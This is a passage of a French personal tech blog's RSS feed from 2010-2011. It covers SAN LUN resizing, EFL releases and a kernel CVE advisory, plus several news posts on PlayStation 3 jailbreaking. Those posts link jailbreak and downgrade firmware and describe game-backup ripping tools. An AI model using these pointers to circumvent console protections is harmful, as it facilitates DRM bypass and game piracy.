      <content>&lt;p&gt;On me dit que je suis mort et qu’il ne se passe rien ici, que nenni !&lt;/p&gt;
&lt;p&gt;Pour la peine, je post ici un bloc note qui pourra servir à certains.. ou pas.&lt;/p&gt;
&lt;p&gt;Ça peut être pratique de procéder a une extension de LUN si la baie de stockage le gère correctement. Par exemple, une &lt;a href=&#34;http://www.emc.com/storage/vnx/vnx-series.htm&#34;&gt;VNX &lt;/a&gt;toute neuve fait cela très bien.&lt;/p&gt;
&lt;p&gt;Coté systeme, il faut gerer le resize des disques pour chaque chemin et du device « multipathé ».&lt;/p&gt;
&lt;p&gt;&lt;code&gt;for i in &lt;/code&gt;multipath -ll mpathX  | awk &amp;lsquo;/sd./ {print $3}&amp;rsquo;&lt;code&gt;; do blockdev --rereadpt /dev/$i ; done&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Puis, il faut rescanner les chemins, soit avec en lancant simplement &lt;code&gt;multipath&lt;/code&gt; soit en utilisant le démon multipathd &lt;code&gt;multipathd -k&amp;quot;resize multipath mpathX&amp;quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Ensuite, il suffit de retailler le FS s’il est directement sur le device ou le physical volume si vous utilisez LVM.&lt;/p&gt;
&lt;p&gt;Ce sera tout merci.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Les EFL sorties en version 1 !</title>
      <link>https://www.lamy.im/posts/les-efl-sorties-en-version-1/</link>
      <pubDate>Tue, 01 Feb 2011 05:51:38 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/les-efl-sorties-en-version-1/</guid>
      <description>Les EFL ou Enlightenment Foundation Library sont sorties en version finale le 29 janvier. Après de longues années de developpement, plusieurs réécritures et beaucoup de moqueries sur la date de sortie, elles sont enfin la 🙂
Les EFL sont les bibliothèques sur lesquels repose entre autre e17, elles sont optimisées pour l’embarqué.
Voici un statut des versions des EFL :
Eina – 1.0.0 Eet – 1.4.0 Evas – 1.0.0 Ecore – 1.</description>
      <content>&lt;p&gt;Les EFL ou Enlightenment Foundation Library sont sorties en version finale le 29 janvier. Après de longues années de developpement, plusieurs réécritures et beaucoup de moqueries sur la date de sortie, elles sont enfin la 🙂&lt;/p&gt;
&lt;p&gt;Les EFL sont les bibliothèques sur lesquels repose entre autre e17, elles sont optimisées pour l’embarqué.&lt;br&gt;
Voici un statut des versions des EFL :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Eina – 1.0.0&lt;/li&gt;
&lt;li&gt;Eet – 1.4.0&lt;/li&gt;
&lt;li&gt;Evas – 1.0.0&lt;/li&gt;
&lt;li&gt;Ecore – 1.0.0&lt;/li&gt;
&lt;li&gt;Embryo – 1.0.0&lt;/li&gt;
&lt;li&gt;Edje – 1.0.0&lt;/li&gt;
&lt;li&gt;E_Dbus – 1.0.0&lt;/li&gt;
&lt;li&gt;Efreet – 1.0.0&lt;/li&gt;
&lt;li&gt;Eeze – 1.0.0&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Je vous renvoie à la bonne &lt;a href=&#34;http://linuxfr.org/2011/01/30/27826.html&#34;&gt;dépèche de Cedric Bail sur DLFP&lt;/a&gt; sur le sujet.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Le serveur jabber n&amp;rsquo;est pas d&amp;rsquo;humeur</title>
      <link>https://www.lamy.im/posts/le-serveur-jabber-nest-pas-dhumeur/</link>
      <pubDate>Tue, 01 Feb 2011 03:55:36 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/le-serveur-jabber-nest-pas-dhumeur/</guid>
      <description>Certains d’entre vous ont peu constater qu’il n’était pas possible de publier son humeur/activité via l’extension PEP. Ce problème est survenu lors de la dernière mise à jour du serveur. Un bug dans le code de migration de la base de données a introduit un problème d’autorisation de publication des comptes sur Pubsub.
Le problème est réglé depuis quelques minutes. Vous pouvez désormais afficher ces informations vitales que sont votre humeur et votre activité.</description>
      <content>&lt;p&gt;Certains d’entre vous ont peu constater qu’il n’était pas possible de publier son humeur/activité via l’extension PEP. Ce problème est survenu lors de la dernière mise à jour du serveur. Un bug dans le code de migration de la base de données a introduit un problème d’autorisation de publication des comptes sur Pubsub.&lt;/p&gt;
&lt;p&gt;Le problème est réglé depuis quelques minutes. Vous pouvez désormais afficher ces informations vitales que sont votre humeur et votre activité.&lt;/p&gt;
&lt;p&gt;Pour ceux ne savent pas, l’inscription est toujours libre sur le serveur jabber, La passerelle MSN est toujours utilisable ainsi que le module webprésence pour afficher son statut sur le web (cf en haut à droite sur ce site)&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>le jailbreak de geohot du firmware 3.55 disponible ! [UPDATE]</title>
      <link>https://www.lamy.im/posts/le-jailbreak-de-geohot-du-firmware-3-55-disponible/</link>
      <pubDate>Sun, 09 Jan 2011 05:47:57 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/le-jailbreak-de-geohot-du-firmware-3-55-disponible/</guid>
      <description>C’est un évènement dans la communauté du hack ps3. Suite a la démonstration en vidéo postée par Geohot hier, les fichiers utilisés sont mise à disposition de tous.
Un jailbreak qui permet d’ouvrir le firmware 3.55 et le premier hombrew signé grâce au travail effectué pour calculer les clefs de chaque firmware. Notez que les anciens homebrows (non signés) ne fonctionneront pas sur ce firmware, les homebrews necessiteront d’être tous signés, les outils necessaires à cela seront disponibles bientot.</description>
      <content>&lt;p&gt;C’est un évènement dans la communauté du hack ps3. Suite a la démonstration en vidéo postée par Geohot hier, les fichiers utilisés sont mise à disposition de tous.&lt;/p&gt;
&lt;p&gt;Un jailbreak qui permet d’ouvrir le firmware 3.55 et le premier hombrew signé grâce au travail effectué pour calculer les clefs de chaque firmware. Notez que les anciens homebrows (non signés) ne fonctionneront pas sur ce firmware, les homebrews necessiteront d’être tous signés, les outils necessaires à cela seront disponibles bientot.&lt;/p&gt;
&lt;p&gt;Le jailbreak est un patch du nas_plugin qui désactive la vérification de la signature des paquets à l’installation. Le cryptage de ceux ci est néanmoins toujours necessaire.&lt;/p&gt;
&lt;p&gt;Ci dessous les nouvelles sur le site de &lt;a href=&#34;http://geohot.com&#34;&gt;geothot&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;it’s &lt;a href=&#34;jailbreak.zip&#34;&gt;jailbreak&lt;/a&gt; time&lt;/strong&gt;&lt;/em&gt;&lt;br&gt;
open the zip, you know how to install&lt;br&gt;
[…]&lt;br&gt;
&lt;a href=&#34;test.pkg&#34;&gt;here&lt;/a&gt; is the package from the video&lt;/p&gt;
&lt;p&gt;no donations accepted right now, don’t get scammed&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;La scène avance vite, mais la realease des outils reste maitrisée par tous ceux qui travaillent dessus pour éviter une débandade totale. Une saine volonté de la scène de ne pas jouer le parasitoïde. Inutile de couper la branche sur laquelle nous sommes assis.&lt;/p&gt;
&lt;p&gt;Ci dessous le EULA du CFW de geohot, just for the lulz:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;geohot jailbreak license agreement&lt;br&gt;
January 8, 2011&lt;br&gt;
PLEASE CLICK OK AND DON’T READ THIS CAUSE IT’S BORING;&lt;br&gt;
BUT SERIOUSLY IF YOU BRICK YOUR SYSTEM, IT’S NOT MY FAULT.&lt;br&gt;
NO WARRANTY EITHER EXPRESSED OR IMPLIED&lt;br&gt;
This Agreement is a joke. This Agreement applies to leet jailbreaks.&lt;/p&gt;
&lt;p&gt;1. LICENSE GRANT&lt;br&gt;
(Insert legal mumbo jumbo and lawyer joke here)&lt;br&gt;
2. RESTRICTIONS&lt;br&gt;
This removes them.&lt;br&gt;
3. PIRACY&lt;br&gt;
Is boring. Basically it’s doing what the system can already do. Fortunately this jailbreak doesn’t allow piracy&lt;br&gt;
3. PUPPIES&lt;br&gt;
Not to be confused with PUPs&lt;br&gt;
4. PATCHING LV2&lt;br&gt;
omg omg omg omg no&lt;br&gt;
5. CROSS GAME CHAT&lt;/p&gt;
&lt;p&gt;You can write it now&lt;br&gt;
c2011 geohot. All rights reserved&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Ci dessous, la vidéo présentée par geohot hier.&lt;/p&gt;

&lt;div style=&#34;position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;&#34;&gt;
  &lt;iframe src=&#34;https://www.youtube.com/embed/UkLSXsCKDkg&#34; style=&#34;position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;&#34; allowfullscreen title=&#34;YouTube Video&#34;&gt;&lt;/iframe&gt;
&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;update 1:&lt;/strong&gt;&lt;br&gt;
Sur certaines ps3, il y a une erreur 8002fb27 ‘data corrupted’ au lancement du jailbreak de geohot. Celui a annoncé travailler sur ce problème. stay tuned 🙂&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;update 2:&lt;/strong&gt;&lt;br&gt;
L’erreur mentionée ci dessous vient du fait que le PUP de Geohot ne gère que le langage anglais. Les consoles dans une autre langue remontent l’erreur 8002fb27. Il est en train de regler le problème et je vous invite a regarder les mise à jour sur &lt;a href=&#34;http://geohot.com&#34;&gt;son site&lt;/a&gt;.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>fail0verflow démontre l&#39;epic fail de sony et ouvre son dépôt GIT</title>
      <link>https://www.lamy.im/posts/fail0verflow-demontre-lepic-fail-de-sony-et-ouvre-son-depot-git/</link>
      <pubDate>Sun, 02 Jan 2011 22:55:30 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/fail0verflow-demontre-lepic-fail-de-sony-et-ouvre-son-depot-git/</guid>
      <description>Nous avions terminé l’année avec une conférence sur la sécurité de la ps3 lors du 27C3 de Berlin. En particulier, Marcan nous apprend comment lui et ses collègues de fail0verflow ont pu calculer sans effort la clef de signature utilisée par Sony sur ses binaires.
Ci dessous les 3 parties de la conférences et la démonstration technique d’une ps3 slim faisant tourner Linux. L’introduction de la conférence est importante car le travail de cette nouvelle team est remise dans son contexte.</description>
      <content>&lt;p&gt;Nous avions terminé l’année avec une conférence sur la sécurité de la ps3 lors du 27C3 de Berlin. En particulier, Marcan nous apprend comment lui et ses collègues de fail0verflow ont pu calculer sans effort la clef de signature utilisée par Sony sur ses binaires.&lt;/p&gt;
&lt;p&gt;Ci dessous les 3 parties de la conférences et la démonstration technique d’une ps3 slim faisant tourner Linux. L’introduction de la conférence est importante car le travail de cette nouvelle team est remise dans son contexte. Pour résumer, le travail de hack de la ps3 n’a commencé qu’une fois la possibilité d’installer Linux sur la ps3 via OtherOS retirée unilatéralement pour des raisons de « sécurité ».&lt;/p&gt;
&lt;p&gt;
&lt;div style=&#34;position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;&#34;&gt;
  &lt;iframe src=&#34;https://www.youtube.com/embed/X6CA4fqAdsc&#34; style=&#34;position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;&#34; allowfullscreen title=&#34;YouTube Video&#34;&gt;&lt;/iframe&gt;
&lt;/div&gt;


&lt;div style=&#34;position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;&#34;&gt;
  &lt;iframe src=&#34;https://www.youtube.com/embed/X8ohOy8_XO4&#34; style=&#34;position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;&#34; allowfullscreen title=&#34;YouTube Video&#34;&gt;&lt;/iframe&gt;
&lt;/div&gt;


&lt;div style=&#34;position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;&#34;&gt;
  &lt;iframe src=&#34;https://www.youtube.com/embed/Eag0VyRTld8&#34; style=&#34;position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;&#34; allowfullscreen title=&#34;YouTube Video&#34;&gt;&lt;/iframe&gt;
&lt;/div&gt;


&lt;div style=&#34;position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;&#34;&gt;
  &lt;iframe src=&#34;https://www.youtube.com/embed/lGI0EnNQ5GE&#34; style=&#34;position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;&#34; allowfullscreen title=&#34;YouTube Video&#34;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;/p&gt;
&lt;p&gt;Marcan a indiqué que les outils seraient rendus disponibles courant janvier mais surprise, &lt;a href=&#34;http://git.fail0verflow.com/?p=ps3tools.git&#34;&gt;le git est déjà ouvert&lt;/a&gt; !&lt;/p&gt;
&lt;p&gt;Ces découvertes mettent vraiment à nue la ps3, bien plus que ne l’ont fait les dongles vendus à prix d’or jusqu’a présent. Geohot a refait surface et sort un dePKG, cet outil permet de décortiquer les fichiers .PUP de firmware. Ce dynamisme nous permet d’espérer pouvoir faire tourner linux sur tous les modèles de ps3 avec ou sans l’accord de sony 🙂&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>CoD black ops 1.4 et jailbreak ps3</title>
      <link>https://www.lamy.im/posts/cod-black-ops-1-4-et-jailbreak-ps3/</link>
      <pubDate>Sat, 18 Dec 2010 05:08:36 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/cod-black-ops-1-4-et-jailbreak-ps3/</guid>
      <description>Le nouveau patch 1.4 pour Call of duty sensé regler des problèmes de jeux en ligne ajoute également une vérification du firmware de la console et demande à passer sur la version 3.50 pour utiliser le jeu.
Soyez vigilants et ne faites pas cette mise à jour, si c’est déjà le cas il suffit de supprimer les données de jeu depuis le XMB pour revenir à la version 1.0.</description>
      <content>&lt;p&gt;Le nouveau patch 1.4 pour Call of duty sensé regler des problèmes de jeux en ligne ajoute également une vérification du firmware de la console et demande à passer sur la version 3.50 pour utiliser le jeu.&lt;/p&gt;
&lt;p&gt;Soyez vigilants et ne faites pas cette mise à jour, si c’est déjà le cas il suffit de supprimer les données de jeu depuis le XMB pour revenir à la version 1.0.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Mise à jour de PSFmod pour téléphones android</title>
      <link>https://www.lamy.im/posts/mise-a-jour-de-psfmod-pour-telephones-android/</link>
      <pubDate>Thu, 16 Dec 2010 01:13:11 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/mise-a-jour-de-psfmod-pour-telephones-android/</guid>
      <description>C’est sur le site de klutsh qu’est parrue il y a quelques jours la mise à jour de son mod de la rom recovery clockwork permettant le jailbreak de ps3 en firmware 3.5 et le downgrade des console en firmware 3.42 ou 3.50.
Cette rom de recovery permet également de charger des fichiers HEX.
Les roms sont disponibles pour plusieurs modèles dont le desire gsm et hero gsm. La manip est simple, un petit flash_image recovery /sdcard/recovery.</description>
      <content>&lt;p&gt;C’est sur le site de &lt;a href=&#34;http://www.klutsh.com&#34;&gt;klutsh&lt;/a&gt; qu’est parrue il y a quelques jours la mise à jour de son mod de la rom recovery clockwork permettant le jailbreak de ps3 en firmware 3.5 et le downgrade des console en firmware 3.42 ou 3.50.&lt;/p&gt;
&lt;p&gt;Cette rom de recovery permet également de charger des fichiers HEX.&lt;/p&gt;
&lt;p&gt;Les roms sont disponibles pour plusieurs modèles dont le desire gsm et hero gsm. La manip est simple, un petit &lt;em&gt;flash_image recovery /sdcard/recovery.img&lt;/em&gt; suffit.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Downgrader la playstation 3 avec firmware 3.50</title>
      <link>https://www.lamy.im/posts/downgrader-la-playstation-3-avec-firmware-3-50/</link>
      <pubDate>Tue, 07 Dec 2010 20:42:09 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/downgrader-la-playstation-3-avec-firmware-3-50/</guid>
      <description>Après que quelques team aient publié leur downgrade pour la PS3, c’est au tour de ps3key de sortir les firmware nécessaires au downgrade des consoles en firmware 3.50 ou 3.42.
Le downgrade permet d’installer un firmware 3.31 qui permet le jailbreak via les méthodes habituelles.
Au cas où les serveurs de la team soient surchargés, vous pouvez télécharger le firmware directement ici.</description>
      <content>&lt;p&gt;Après que quelques team aient publié leur downgrade pour la PS3, c’est au tour de ps3key de sortir les firmware nécessaires au downgrade des consoles en firmware 3.50 ou 3.42.&lt;br&gt;
Le downgrade permet d’installer un firmware 3.31 qui permet le jailbreak via les méthodes habituelles.&lt;/p&gt;
&lt;p&gt;Au cas où les serveurs de la team soient surchargés, vous pouvez &lt;a href=&#34;https://www.lamy.im/uploads/2010/12/ps3key_jig.tar&#34;&gt;télécharger le firmware directement ici&lt;/a&gt;.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>root du HTC Desire Orange</title>
      <link>https://www.lamy.im/posts/root-du-htc-desire-orange/</link>
      <pubDate>Tue, 09 Nov 2010 15:47:22 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/root-du-htc-desire-orange/</guid>
      <description>Rooter un HTC desire n’a rien d’amusant, c’est même trop facile. Il suffit d’aller sur le site d’unrevoked, de cliquer sur son modèle de téléphone et de télécharger l’application. La version windows est buguée, préferez utiliser les versions linux ou mac.
Apres quelques minutes la ROM de recovery est flashée avec une clockworkmod. Il n’y a plus qu’à installer sa custom ROM favorite soit par l’application ROM manager du market soit par la recovery directement.</description>
      <content>&lt;p&gt;Rooter un HTC desire n’a rien d’amusant, c’est même trop facile. Il suffit d’aller sur le &lt;a href=&#34;http://unrevoked.com/&#34;&gt;site d’unrevoked&lt;/a&gt;, de cliquer sur son modèle de téléphone et de télécharger l’application. La version windows est buguée, préferez utiliser les versions linux ou mac.&lt;/p&gt;
&lt;p&gt;Apres quelques minutes la ROM de recovery est flashée avec une &lt;a href=&#34;http://www.clockworkmod.com/&#34;&gt;clockworkmod&lt;/a&gt;. Il n’y a plus qu’à installer sa custom ROM favorite soit par l’application &lt;em&gt;ROM manager&lt;/em&gt; du market soit par la recovery directement.&lt;/p&gt;
&lt;p&gt;Bref, même pas marrant.&lt;/p&gt;
&lt;p&gt;Et hop, exit les applications et les bookmark préinstallés par orange, quand ce n’est pas une application essentielle (Gtalk) qui est tout simplement supprimée sur leur ROM.&lt;br&gt;
Ouf de l’air.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>ps3key et quelques news du psjailbreak</title>
      <link>https://www.lamy.im/posts/ps3key-et-quelques-news-du-psjailbreak/</link>
      <pubDate>Tue, 12 Oct 2010 16:14:57 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/ps3key-et-quelques-news-du-psjailbreak/</guid>
      <description>C’est avec pas mal de retard que je post ici mes impressions sur la ps3key.
La ps3key est le clone PSjailbreak de la team WiiKey.
Cette clef est fournie avec un numéro de série qui vous permet de télécharger l’outil de mise à jour et les nouveaux firmwares sur le site officiel ps3key
Le principe de fonctionnement est toujours le même:
Branchement de la clef Coupure éléctrique de la console Allumage de la console avec un appui rapide de « power » puis « eject » 3 bips se font entendre.</description>
      <content>&lt;p&gt;C’est avec pas mal de retard que je post ici mes impressions sur la ps3key.&lt;br&gt;
La ps3key est le clone PSjailbreak de la team WiiKey.&lt;br&gt;
Cette clef est fournie avec un numéro de série qui vous permet de télécharger l’outil de mise à jour et les nouveaux firmwares sur le &lt;a href=&#34;http://www.ps3key.com/en/&#34;&gt;site officiel ps3key&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.lamy.im/uploads/2010/10/IMG_20101012_154817.jpg&#34;&gt;&lt;img src=&#34;https://www.lamy.im/uploads/2010/10/IMG_20101012_154817-300x226.jpg&#34; alt=&#34;&#34; title=&#34;IMG_20101012_154817&#34;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Le principe de fonctionnement est toujours le même:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Branchement de la clef&lt;/li&gt;
&lt;li&gt;Coupure éléctrique de la console&lt;/li&gt;
&lt;li&gt;Allumage de la console avec un appui rapide de « power » puis « eject »&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;3 bips se font entendre. La ps3key clignote puis la diode bleu s’allume.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.lamy.im/uploads/2010/10/IMG_20101012_155300.jpg&#34;&gt;&lt;img src=&#34;https://www.lamy.im/uploads/2010/10/IMG_20101012_155300-226x300.jpg&#34; alt=&#34;&#34; title=&#34;IMG_20101012_155300&#34;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Ensuite, comme d’habitude il y le nouveau menu qui permet d’installer des .pkg non signés depuis une clef USB quelconque.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.lamy.im/uploads/2010/10/IMG_20101012_154940.jpg&#34;&gt;&lt;img src=&#34;https://www.lamy.im/uploads/2010/10/IMG_20101012_154940-300x226.jpg&#34; alt=&#34;&#34; title=&#34;IMG_20101012_154940&#34;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Les applications principales à l’heure actuelle sont un gestionnaire de fichier, un serveur ftp, le backup manager qui permet de sauvegarder ses jeux sur le disque interne ou sur un disque externe USB, il y a aussi un émulateur super NES et quelques projets de jeux homebrew qui démarrent.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.lamy.im/uploads/2010/10/IMG_20101012_154855.jpg&#34;&gt;&lt;img src=&#34;https://www.lamy.im/uploads/2010/10/IMG_20101012_154855-300x226.jpg&#34; alt=&#34;&#34; title=&#34;IMG_20101012_154855&#34;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Actuellement SONY fait la guerre au PSjailbreak et à tous ses clones et il est de plus en plus difficile de s’en procurer. Il reste la solution des clefs USB à base de chipset ATMEL qui sont programmables avec les firmware HEX fourni par les différentes team de la scène ou les différentes méthodes à base de téléphone ou de calculatrice.&lt;/p&gt;
&lt;p&gt;Une nouvelle version du backup manager devrait sortir à la fin du mois, peu d’informations sont disponibles à l’heure actuelle. Il se pourrait que cette nouvelle version permette une meilleure compatibilité avec les jeux aunsi qu’une vitesse de rip améliorée.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Sony campe sur sa position à propos d&amp;rsquo;OtherOS</title>
      <link>https://www.lamy.im/posts/sony-campe-sur-sa-position-a-propos-dotheros/</link>
      <pubDate>Mon, 20 Sep 2010 00:28:00 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/sony-campe-sur-sa-position-a-propos-dotheros/</guid>
      <description>Pas de changement chez SONY. Ils ne comptent visiblement pas revenir sur la suppression de la fonctionalité OtherOS qui permettait de faire tourner Linux (l’accès au matériel etait néanmoins limité) sur sa PS3.
Des actions en justices sont en cours contre SONY a ce propos. La réponse de la société japonaise est visible sur IGN.
Pour rappel, la scene ps3 est en pleine effervescence en ce moment et des travaux sont en cours afin de retrouver cette fonctionalité</description>
      <content>&lt;p&gt;Pas de changement chez SONY. Ils ne comptent visiblement pas revenir sur la suppression de la fonctionalité OtherOS qui permettait de faire tourner Linux (l’accès au matériel etait néanmoins limité) sur sa PS3.&lt;/p&gt;
&lt;p&gt;Des actions en justices sont en cours contre SONY a ce propos. &lt;a href=&#34;http://uk.ps3.ign.com/articles/112/1121709p1.html&#34;&gt;La réponse de la société japonaise est visible sur IGN&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Pour rappel, la scene ps3 est en pleine effervescence en ce moment et des travaux sont en cours afin de retrouver cette fonctionalité&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Le retour de la faille de l&#39;émulation 32 bits sur Linux64</title>
      <link>https://www.lamy.im/posts/le-retour-de-la-faille-de-lemulation-32-bits-sur-linux64/</link>
      <pubDate>Mon, 20 Sep 2010 00:17:14 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/le-retour-de-la-faille-de-lemulation-32-bits-sur-linux64/</guid>
      <description>C’est la revengeance du fils d’une vieille faille qui à été publiée la faille de sécurité référencée CVE-2010-3301 dans l’émutation 32 bits sur les kernel 64 bits. L’exploitation de cette faille permet a un utilisateur local de passer root sur le serveur.
Il s’agit en fait d’une faille déja connue et publiée en 2007 sous la reférence CVE-2007-4573 et corrigée dans le noyau 2.6.22.7. Une régression dans le noyau 2.6.27-rc1 via le commit d4d67150 fait réaparaitre la faille.</description>
      <content>&lt;p&gt;C’est la revengeance du fils d’une vieille faille qui à été publiée la faille de sécurité référencée &lt;a href=&#34;http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3301&#34;&gt;CVE-2010-3301&lt;/a&gt; dans l’émutation 32 bits sur les kernel 64 bits. L’exploitation de cette faille permet a un utilisateur local de passer root sur le serveur.&lt;/p&gt;
&lt;p&gt;Il s’agit en fait d’une faille déja connue et publiée en 2007 sous la reférence &lt;a href=&#34;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4573&#34;&gt;CVE-2007-4573&lt;/a&gt; et corrigée dans le noyau 2.6.22.7. Une régression dans le noyau 2.6.27-rc1 via le commit d4d67150 fait réaparaitre la faille.&lt;/p&gt;
&lt;p&gt;Si votre noyau est vulnérable, il est recommandé d’appliquer le patch disponible ou de mettre à jour si votre distribution à déjà mis à disposition un noyau patché.&lt;/p&gt;
&lt;p&gt;sources:&lt;br&gt;
&lt;a href=&#34;http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=36d001c70d8a0144ac1d038f6876c484849a74de&#34;&gt;Patch 1&lt;/a&gt;&lt;br&gt;
&lt;a href=&#34;http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=eefdca043e8391dcd719711716492063030b55ac&#34;&gt;Patch 2&lt;/a&gt;&lt;br&gt;
&lt;a href=&#34;http://sota.gen.nz/compat2/&#34;&gt;Faille rapportée par Ben Hawkes&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Il fait moche à Nazareth</title>
      <link>https://www.lamy.im/posts/il-fait-moche-a-nazareth/</link>
      <pubDate>Thu, 16 Sep 2010 13:54:27 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/il-fait-moche-a-nazareth/</guid>
      <description>Nazareth n’est pas si loin finalement, je suis passé devant par hasard en roulant sur l’autoroute E17. On y passe sans s’arreter, c’est pas très beau et il y fait mauvais temps, jugez vous même:
Bref, une ville vide, seuls quelques arbres et panneau. Faut être con pour aller faire des pelerinages la bas.
Un jour peut être que j’irai verifier ces histoires de petit jésus. En tout cas, s’il est de la bas, il a tout le necessaire: parking, hotel, resto et même une station essence !</description>
      <content>&lt;p&gt;Nazareth n’est pas si loin finalement, je suis passé devant par hasard en roulant sur l’autoroute E17. On y passe sans s’arreter, c’est pas très beau et il y fait mauvais temps, jugez vous même:&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://www.lamy.im/uploads/2010/09/P1000835.jpg&#34;&gt;&lt;img src=&#34;https://www.lamy.im/uploads/2010/09/P1000835-300x225.jpg&#34; alt=&#34;Nazareth&#34; title=&#34;P1000835&#34;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Bref, une ville vide, seuls quelques arbres et panneau. Faut être con pour aller faire des pelerinages la bas.&lt;/p&gt;
&lt;p&gt;Un jour peut être que j’irai verifier ces histoires de petit jésus. En tout cas, s’il est de la bas, il a tout le necessaire: parking, hotel, resto et même une station essence !&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>ps3key livrées bientôt et quelques news</title>
      <link>https://www.lamy.im/posts/ps3key-livrees-bientot-et-quelques-news/</link>
      <pubDate>Wed, 15 Sep 2010 17:12:42 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/ps3key-livrees-bientot-et-quelques-news/</guid>
      <description>D’ici quelques jours je devrai recevoir quelques exemplaires de la PS3key. Cette clef USB permet de s’affranchir des manipulation avec un téléphone pour jailbreaker sa PS3.
Ces clefs ont l’avantage de ne pas necessiter de triturer son téléphone mais ont l’inconvénient de rendre l’utilisateur dépendant de la team qui maintient le soft. En effet la réactivité de la team et la fréquence des mises à jour sont des éléments essentiels à l’usage.</description>
      <content>&lt;p&gt;D’ici quelques jours je devrai recevoir quelques exemplaires de la PS3key. Cette clef USB permet de s’affranchir des manipulation avec un téléphone pour jailbreaker sa PS3.&lt;br&gt;
Ces clefs ont l’avantage de ne pas necessiter de triturer son téléphone mais ont l’inconvénient de rendre l’utilisateur dépendant de la team qui maintient le soft. En effet la réactivité de la team et la fréquence des mises à jour sont des éléments essentiels à l’usage.&lt;/p&gt;
&lt;p&gt;Malgrès les gesticulations de SONY auprès des douanes chinoises pour empecher toute exportation de ce type de clef. Des milliers de clones sont deja en production et en cours d’acheminement vers les fournisseurs du monde entier.&lt;/p&gt;
&lt;p&gt;Des que je reçoit les clefs, je posterai mes impressions ici.. Stay tuned!&lt;/p&gt;
&lt;p&gt;Rappelons que Gehot n’a rien à voir avec les récentes méthodes de jailbreak de PS3. Notre vieil ami n’a réussi qu’a faire du bruit et a pousser SONY à dépouiller sauvagement les PS3 de la fonction OtherOS.&lt;/p&gt;
&lt;p&gt;De nouveaux homebrews/applications sont en cours de developpement en ce moment même pour nos cheres ps3, en particulier un &lt;a href=&#34;http://www.elotrolado.net/hilo_actualizado-gamezplorer-backup-manager_1485097&#34;&gt;explorateur de disque dur&lt;/a&gt; prometteur.&lt;/p&gt;
&lt;p&gt;La &lt;a href=&#34;http://wiki.psfreedom.com/wiki/Device_compatibility_list&#34;&gt;liste de compatibilité des mobiles avec psfreedom&lt;/a&gt; s’alonge de jours en jours, n’hesitez pas à y jeter un oeil !&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>backup manager sur ps3</title>
      <link>https://www.lamy.im/posts/backup-manager-sur-ps3/</link>
      <pubDate>Tue, 14 Sep 2010 19:48:43 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/backup-manager-sur-ps3/</guid>
      <description>Et hop! Apres avoir libéré sa PS3 il faut bien en faire quelque chose. Si on commençait par faire quelques backups de jeu?
